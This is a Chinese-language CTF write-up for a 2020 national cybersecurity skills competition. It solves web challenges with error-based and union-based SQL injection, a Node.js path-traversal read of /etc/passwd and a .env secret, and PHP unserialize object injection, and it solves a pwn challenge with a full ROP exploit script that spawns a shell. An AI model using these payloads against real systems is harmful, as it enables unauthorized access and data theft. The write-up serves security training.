2020年全国网络安全管理职业技能竞赛-WriteUp

WEB

easy_sql

首先先开代理利用burpsuite抓包分析，在username=admin'先加个单引号，发现如下报错

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'admin') LIMIT 0,1' at line 1

猜测sql语句大概是这种样子：select * from table where username=('admin') and password=('passwd') limit 0,1;

根据这个语句构造payload为uname=admin') and 1=1%23和uname=admin') and 1=2%23不难看出该出sql语句可被利用

接下来先利用sqlmap进行扫描，发现了flag表，猜测flag就在这张表里

但是sqlmap跑不出flag表的字段名称，于是开始了手动测试

因为该sql注入类型为没有回显，但是有报错，所以选择的报错注入，构造payload uname=admin') and extractvalue(1,concat(char(126),(select column_name from information_schema.columns where table_name='flag' and table_schema='security' limit 0,1)))%23&passwd=admin查询flag的第一个字段名，但是被拦截了

想了许久，最终直接构造为uname=admin') and extractvalue(1,concat(char(126),(select * from flag)))%23&passwd=admin，直接查询flag表的内容，然后mysql就会通过报错的形式把这条语句查询到的信息返回到浏览器上

最后通过right函数，将flag内容从右到左切割

最终拼接出flag为flag{c7651cb673c911ee8f9977094a220f17}

ezsqli

进入题目环境后，点击查看HINT，然后可以看到源代码，注释如下

 <?php
//a "part" of the source code here

function sqlWaf($s)
{
    $filter = '/xml|extractvalue|regexp|copy|read|file|select|between|from|where|create|grand|dir|insert|link|substr|mid|server|drop|=|>|<|;|"|\^|\||\ |\'/i';
    if (preg_match($filter,$s))
        return False;
    return True;
}
// 判断是否存在POST请求中是否存在username和password
if (isset($_POST['username']) && isset($_POST['password'])) {
    // 判断session中是否存在VerifyCode
    if (!isset($_SESSION['VerifyCode']))
            die("?");	// 不存在则停止并输出？
	
    $username = strval($_POST['username']); // 进行字符串类型转换
    $password = strval($_POST['password']); // 进行字符串类型转换

    if ( !sqlWaf($password) )
        // 对传进来的password变量进行拦截恶意字符串
        alertMes('damn hacker' ,"./index.php");
	
    $sql = "SELECT * FROM users WHERE username='${username}' AND password= '${password}'";
//    password format: /[A-Za-z0-9]/
    $result = $conn->query($sql);  // 执行上面的sql语句
    if ($result->num_rows > 0) {
        // 当查询的条目行数大于0时，获取第一行作为数组赋值给变量$row
        $row = $result->fetch_assoc();
        if ( $row['username'] === 'admin' && $row['password'] )
        {
            // 判断查询出来的的username必须为admin，并且该行的password不能为空
            if ($row['password'] == $password) 
            {	// 查询出的password值需要与POST传进来的password相等才能输出flag
                $message = $FLAG;
            } else {
                $message = "username or password wrong, are you admin?";
            }
        } else {
            $message = "wrong user";
        }
    } else {
        $message = "user not exist or wrong password";
    }
}

?> 

分析完代码后，总结出关键的几个必要条件：

• 从数据库查询的username必须为admin => 传进去的username必须为admin
• 从数据库查询出password满足条件(bool)(password) == True即必须存在且有大于0的值 => 因为数据库中admin值对应的password字段值未知，且根据源代码分析未找到相应绕过验证的方法，只能从sql语句入手。

使用本地环境调试，当我构造sql语句为select * from table_name where username='adminsada' union select 'admin','password';时，结果如下：

因为我前面的sql语句没有查询到内容，所以就会显示后面所查询的内容，而我后面的联合查询语句为union select 'admin','password';这条语句的意思是直接输出admin和password，从而就能控制数据库中输出的内容。但联合查询是有条件的，就是union select column_name1, column_name2....中，column_name的数必须和前面查询语句的字段数一致，所以这边需要先知道题目中的前一条sql语句查询的字段数为多少。

构造payloadusername=hhhh'+union+select+1,2,3--+&password=password&captcha=SDMG进行查询，查询结果为下图

可想而知，到达了wrong user这一步，不难猜测出我的sql语句执行成功，且为三个字段，目前猜测分别为id,username,password，且该语句查询完成后，username为1，password为2（因为前面没有查询到有用户为hhhh的，所以取到了后面的一条查询记录）

继续构造payload为username=hhh'+union+select+1,'admin','password'--+&password=password&captcha=SDMG

成功把flag查询出来flag{de3110dce011088cd4add1950a49182f}

（ps. 验证码是真的烦）

SecretGuess

下载题目所给的附件，目录结构如下

看到了构建镜像环境的文件Dockerfile，具体内容如下

FROM node:8.5
COPY ./src /usr/local/app
WORKDIR /usr/local/app
ENV FLAG=flag{**********}
RUN npm i --registry=https://registry.npm.taobao.org
EXPOSE 80
CMD node /usr/local/app/app.js

瞄一眼，暂时还没头绪，继续从题目中找线索

查看网页源代码，发现出题人的提示

然后又在源码中看到了隐藏源代码的链接（为什么说隐藏，因为这个div被背景色盖住了，设置z-index: 999就可以看到并且点击了）

（此步可忽略不计）

然后访问源代码链接可以看到如下代码

const express = require('express');
const path = require('path');
const env = require('dotenv').config();
const bodyParser = require('body-parser');
const crypto = require('crypto');
const fs = require('fs')
const hbs = require('hbs');
const process = require("child_process")

const app = express();

app.use('/static', express.static(path.join(__dirname, 'public')));
app.use(bodyParser.urlencoded({ extended: false }))
app.use(bodyParser.json());
app.set('views', path.join(__dirname, "views/"))
app.engine('html', hbs.__express)
app.set('view engine', 'html')

app.get('/', (req, res) => {
    res.render("index")
})

app.post('/', (req, res) => {
    if (req.body.auth && typeof req.body.auth === 'string' && crypto.createHash('md5').update(env.parsed.secret).digest('hex') === req.body.auth ) {
        res.render("index", {result: process.execSync("echo $FLAG")})
    } else {
        res.render("index", {result: "wrong secret"})
    }
})

app.get('/source', (req, res) => {
    res.end(fs.readFileSync(path.join(__dirname, "app.js")))
})

app.listen(80, "0.0.0.0");

这里先看主要输出flag的核心代码

// 加载配置文件中的环境变量
const env = require('dotenv').config();

// 获取一个post请求包数据
app.post('/', (req, res) => {
    // 1. post对象中存在auth属性（即post请求参数中带auth）
    // 2. auth属性值必须为字符串类型
    // 3. 并且auth属性值必须与nodejs环境变量中的secret的md5值相等
    if (req.body.auth && typeof req.body.auth === 'string' && crypto.createHash('md5').update(env.parsed.secret).digest('hex') === req.body.auth ) {
        // 同时满足三个条件就可以输出flag
        res.render("index", {result: process.execSync("echo $FLAG")})
    } else {
        res.render("index", {result: "wrong secret"})
    }
})

简单的分析代码已完成，现在就开始梳理接替思路：

目前我们所知道的信息就是部分源代码中的文件，且出题人也说了不是爆破，那肯定是要获取到node的配置文件。

刚开始我以为配置文件中关键的变量secret藏在.开头的文件，还特意一个一个去搜，搜不到，后面仔细回忆才想起来一个重要的镜像环境搭建文件Dockerfile，里面包含了node版本和项目的部署地址。

于是我就尝试去搜索node 8.5版本漏洞，结果还真有存在一个目录变量漏洞

而且正好这个题目的node版本为8.5.0，尝试复现漏洞，构造``app.js文件构造相应的payload/static/../../../a/../../../../etc/passwd`（需要把请求改为GET）进行漏洞验证

验证成功，然后根据之前的Dockerfile获取项目的绝对路径，构造payload/static/../../../a/../../../../usr/local/app/.env进行读取node配置文件中的secret变量

最后再将获取到的secret进行md5加密，最后提交获取到flag

warmup

下载题目源码，主要有有三个文件的源代码，首先先分析index.php（html代码已忽略）

// index.php
<?php
include 'conn.php';
include 'flag.php';


if (isset ($_COOKIE['last_login_info'])) {
    // 当cookie存在last_login_info字段时，将先进行base64解密，然后反序列化
    $last_login_info = unserialize (base64_decode ($_COOKIE['last_login_info']));
    try {
        if (is_array($last_login_info) && $last_login_info['ip'] != $_SERVER['REMOTE_ADDR']) {
            // 判断反序列化后的数组是否为数组并且数组中key=>ip的值是否与访问者的IP相同
            die('WAF info: your ip status has been changed, you are dangrous.'); //不同则输出并停止运行
        }
    } catch(Exception $e) {
        die('Error');
    }
} else {
    // 当不存在键为ip的数组时，创建以访问者IP为值的ip键，并将其先序列化后进行base64加密
    $cookie = base64_encode (serialize (array ( 'ip' => $_SERVER['REMOTE_ADDR']))) ;
    // 将该反序列化字符串设置为last_login_info为键的值
    setcookie ('last_login_info', $cookie, time () + (86400 * 30));
}


if(isset($_POST['username']) && isset($_POST['password'])){
    // 判断POST数据中是否存在username和password
	$table = 'users';
    // 将username和password进行转义
	$username = addslashes($_POST['username']);
	$password = addslashes($_POST['password']);
	// 实例化一个SQL类
	$sql = new SQL();
    // 调用SQL类中的connect()方法
	$sql->connect();
    // 给当前实例化的SQL类中table、username、password属性分别进行赋值
	$sql->table = $table;
    $sql->username = $username;
    $sql->password = $password;
    // 调用当前SQL类的check_login()方法进行校验
    $sql->check_login();
}
?>

然后再看ip.php文件

// ip.php
<?php
    // 输出当前访问者的IP
	echo $_SERVER['REMOTE_ADDR'];
?>

最后是输出flag的核心文件conn.php

// conn.php
<?php
include 'flag.php';

 class SQL {
    public $table = '';
    public $username = '';
    public $password = '';
    public $conn;
    public function __construct() {
    }
    
    public function connect() {
        // mysql数据库连接
        $this->conn = new mysqli("localhost", "xxxxx", "xxxx", "xxxx");
    }

    public function check_login(){
        // 调用当前类中的query()方法
        $result = $this->query();
        if ($result === false) {
            // 判断返回结果是否正确
            die("database error, please check your input");
        }
        // 取查询到第一行结果以数组形式赋值给变量$row
        $row = $result->fetch_assoc();
        if($row === NULL){
            die("username or password incorrect!");
        }else if($row['username'] === 'admin'){
            // 当查询出来的username为admin时，输出flag
            $flag = file_get_contents('flag.php');
            echo "welcome, admin! this is your flag -> ".$flag;
        }else{
            echo "welcome! but you are not admin";
        }
        $result->free();
    }

    public function query() {
        // 对table、username和password进行恶意字符串过滤
        $this->waf();
        // 执行sql语句并返回执行结果
        return $this->conn->query ("select username,password from ".$this->table." where username='".$this->username."' and password='".$this->password."'");
    }

    public function waf(){
    	$blacklist = ["union", "join", "!", "\"", "#", "$", "%", "&", ".", "/", ":", ";", "^", "_", "`", "{", "|", "}", "<", ">", "?", "@", "[", "\\", "]" , "*", "+", "-"];
    	foreach ($blacklist as $value) {
            // 循环变量黑名单中的每一个元素，并进行字符串查找
    		if(strripos($this->table, $value)){
    			die('bad hacker,go out!');
    		}
    	}
        foreach ($blacklist as $value) {
            if(strripos($this->username, $value)){
                die('bad hacker,go out!');
            }
        }
        foreach ($blacklist as $value) {
            if(strripos($this->password, $value)){
                die('bad hacker,go out!');
            }
        }
    }

    public function __wakeup(){
        // 执行反序列化实例化类前，会自动调用此方法
        if (!isset ($this->conn)) {
            // 判断当前类中是否进行数据库连接
            // 若没有则进行数据库连接
            $this->connect ();
        }
        if($this->table){
            // 当前类存在table变量值时，执行waf()方法
            $this->waf();
        }
        // 调用check_login()方法
        $this->check_login();
        // 关闭数据库连接
        $this->conn->close();
    }

}
?>

获取到的信息整理如下：

• 此处条件只要当反序列化后的对象不为数组即可绕过该行代码，比较顺水推舟（因为我们构造的反序列化结果是一个实例化类，这里自然而然的就绕过了）

  if (isset ($_COOKIE['last_login_info'])) {
      $last_login_info = unserialize (base64_decode ($_COOKIE['last_login_info']));
      try {
          if (is_array($last_login_info) && $last_login_info['ip'] != $_SERVER['REMOTE_ADDR']) {
              // 当进入此处时，就会停止运行程序，所以不能进来
              die('WAF info: your ip status has been changed, you are dangrous.'); 
          }
      } catch(Exception $e) {
          die('Error');
      }
  }

• 过滤黑名单中并没有过滤单引号

• 虽然在index.php中有对username和password进行字符转义，但是可以看到，转义前有一个反序列化操作，所以可以直接通过反序列化进行实例化一个类去执行类中的代码，从而进行绕过下面的字符转义操作。

• 令sql查询结果有值，并且username = admin即可，并没有对password的查询结果进行校验，所以构造类似的payload即可username=admin&password=1' or '1'='1，这样就能在查出username为admin的一条记录，从而获取flag

分析完成之后，开始上手操作，先利用burpsuite抓个包看看

将last_login_info先进行base64解密，得到如下序列化字符串a:1:{s:2:"ip";s:13:"39.170.14.162";}（大可不必管，我就是想看看）

直接构造序列化payload：O:3:"SQL":4:{s:5:"table";s:5:"users";s:8:"username";s:5:"admin";s:8:"password";s:10:"1'or'1'='1";s:4:"conn";N;}

即实例化SQL类并对该类下面的table、username、和password变量进行赋值，至于其中的conn可无需赋值，一时里面结构过于复杂，二是当进行反序列化操作前，会自动调用__wakeup()方法，该类下面 的方法会对conn进行赋值的。

public function __wakeup(){
    if (!isset ($this->conn)) {
        $this->connect ();
    }
    if($this->table){
        $this->waf();
    }
    $this->check_login();
    $this->conn->close();
}

最后查询出flag为flag{5dd2d5f45fw6e6f11ewf1f224f5121e2}

PWN

0x01. easy_rop

先checksec分析下程序的保护机制，可以看到开启了NX保护，即栈不可执行，故需要跳转到对应的libc去执行。

而且该文件有800多k，且没有给出libc.so文件，说明是静态编译，通过IDA查看

显然找不到程序入口函数，故直接使用gdb进行动态调试，运行后有一个什么也没有输出的输入，直接Ctrl + c 终端输入来到调试界面，并在0x43f2f0处打上断点。

通过cyclic指令计算出溢出长度为40



再gadget下看看有没有合适的指令构造rop链

其中C语言中的execve("/bin/sh", NULL, NULL)对应的汇编指令如下：

mov eax, 0xb
mov ebx, ["/bin/sh"]
mov ecx, 0
mov edx, 0
int 0x80

由于该程序是64bit，故构造ROP链需要涉及rax、rbx、rcx、rdx寄存器，从上述gadget中找出以下合适的指令：

0x0000000000478446 : pop rax ; pop rdx ; pop rbx ; ret
0x0000000000488a95 : int 0x80

由于该指令没有涉及rcx寄存器，故需要通过其他指令给其赋值，但找了许久，只有以下指令勉强合适，以及该指令涉及到的其他指令：

0x000000000043b270 : mov rcx, qword ptr [rsi] ; mov byte ptr [rdi + 8], dh ; mov qword ptr [rdi], rcx ; ret
0x00000000004015f6 : pop rdi ; ret
0x0000000000401717 : pop rsi ; ret

只要控制好各个寄存器的值就能通过系统中断调用执行execve函数，目前还差/bin/sh字符（二进制文件也没有），于是需要自己往bss写入对应字符，最后再调用命令执行函数即可，涉及到的指令和内存地址如下：

zero_addr = 0x4b4680  # \0符号
bss_addr = 0x6cbb60  # bss段的起始地址

# syscall系统调用地址，用于实现类似于read函数，是通过ida自己找了个比较合适的地址
# gadget没有返回理想的syscall_ret指令
syscall_ret = 0x43f2ee 

# Linux 64bit 函数调用约定，
# 前6个参数是从左至右依次存放入rdi,rsi,rdx,rcx,r8,r9寄存器，剩下的参数通过栈传递，
# 从右至左顺序入栈
pop_rdx_rsi_ret = 0x442779

现在的思路是通过栈溢出调用syscall，使其往bss段写入/bin/sh字符，再分别往rax、rbx、rcx、rdx寄存器写入对应值，最后int 80即可，编写EXP如下；

from pwn import *
import time


context(os='linux', arch='amd64')	# 运行环境设置
p = process('./5f55ce3d7d306')	# 运行该可执行文件

elf = ELF('./5f55ce3d7d306')


zero_addr = 0x4B4680
bss_addr = 0x6cbb60
pop_rdi_ret = 0x4015f6
pop_rsi_ret = 0x401717
pop_rdx_rsi_ret = 0x442779
pop_rax_rdx_rbx_ret = 0x478446
mov_rcx_rsi_ret = 0x43b270  # mov rcx, qword ptr [rsi] ; mov byte ptr [rdi + 8], dh ; mov qword ptr [rdi], rcx ; ret

syscall_ret = 0x43F2EE
int_80 = 0x488a95

# sys_read(rdi, rsi, rdx) (0, bss_address, 100
# write strings "/bin/sh" will in reg's rsi
payload = b'a' * 40 + p64(pop_rdx_rsi_ret) + p64(0x10) + p64(bss_addr) + p64(pop_rdi_ret) + p64(0) + p64(syscall_ret) + p64(pop_rax_rdx_rbx_ret) + p64(0xb) + p64(0) + p64(bss_addr) + p64(pop_rdi_ret) + p64(bss_addr + 0x10) + p64(pop_rsi_ret) + p64(zero_addr) + p64(mov_rcx_rsi_ret) + p64(int_80)
p.sendline(payload)
time.sleep(1)
p.sendline(b'/bin/sh\x00')
p.interactive()

运行exp即可拿到服务器shell